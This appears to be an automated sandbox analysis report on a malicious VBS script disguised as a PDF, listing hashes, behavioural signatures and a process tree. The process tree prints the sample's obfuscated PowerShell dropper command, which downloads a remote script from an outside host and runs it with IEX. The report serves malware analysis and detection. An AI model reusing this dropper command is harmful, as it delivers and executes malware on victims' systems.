Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
25-10-2021 06:15
Static task
static1
Behavioral task
behavioral1
Sample
ATGSVCN64670.pdf.vbs
Resource
win7-en-20211014
windows7_x64
0 signatures
0 seconds
General
-
Target
ATGSVCN64670.pdf.vbs
-
Size
741B
-
MD5
e06db4f9c991c9e5e4df226f567b8a99
-
SHA1
389820f7a7449f175ee6a5bb2d80004f42613638
-
SHA256
b1a19a89c4c0b8efa1ebf594bd266b914e3f5621d12edff2fbf4d48bb0e32447
-
SHA512
bddc4feed5b04b276b9fb0dc85825a1455efb6c297e182680e918523f4bf96a73d990a3dcd61a1a6d6a65bbd5a2e5f974b1d77d27c301ed46e58a54849328a19
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://lacycoligan.com/.Final.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 108 powershell.exe 6 108 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 108 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1648 wrote to memory of 108 1648 WScript.exe powershell.exe PID 1648 wrote to memory of 108 1648 WScript.exe powershell.exe PID 1648 wrote to memory of 108 1648 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ATGSVCN64670.pdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow^!loadStri^!g'.replace('^!','n'),[Microsoft.VisualBasic.CallType]::Method,'https://+++++++++++++++++++++.com/.Final.txt'.Replace('+++++++++++++++++++++','lacycoligan'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/108-56-0x0000000000000000-mapping.dmp
-
memory/108-58-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmpFilesize
11.4MB
-
memory/108-61-0x0000000002834000-0x0000000002837000-memory.dmpFilesize
12KB
-
memory/108-60-0x0000000002832000-0x0000000002834000-memory.dmpFilesize
8KB
-
memory/108-59-0x0000000002830000-0x0000000002832000-memory.dmpFilesize
8KB
-
memory/108-62-0x000000001B750000-0x000000001BA4F000-memory.dmpFilesize
3.0MB
-
memory/108-63-0x000000000283B000-0x000000000285A000-memory.dmpFilesize
124KB
-
memory/1648-55-0x000007FEFBF81000-0x000007FEFBF83000-memory.dmpFilesize
8KB